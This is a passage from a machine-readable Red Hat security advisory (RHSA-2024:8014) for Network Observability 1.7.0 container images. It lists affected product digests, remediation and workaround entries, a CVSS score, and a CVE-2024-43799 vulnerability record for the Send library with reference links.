"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
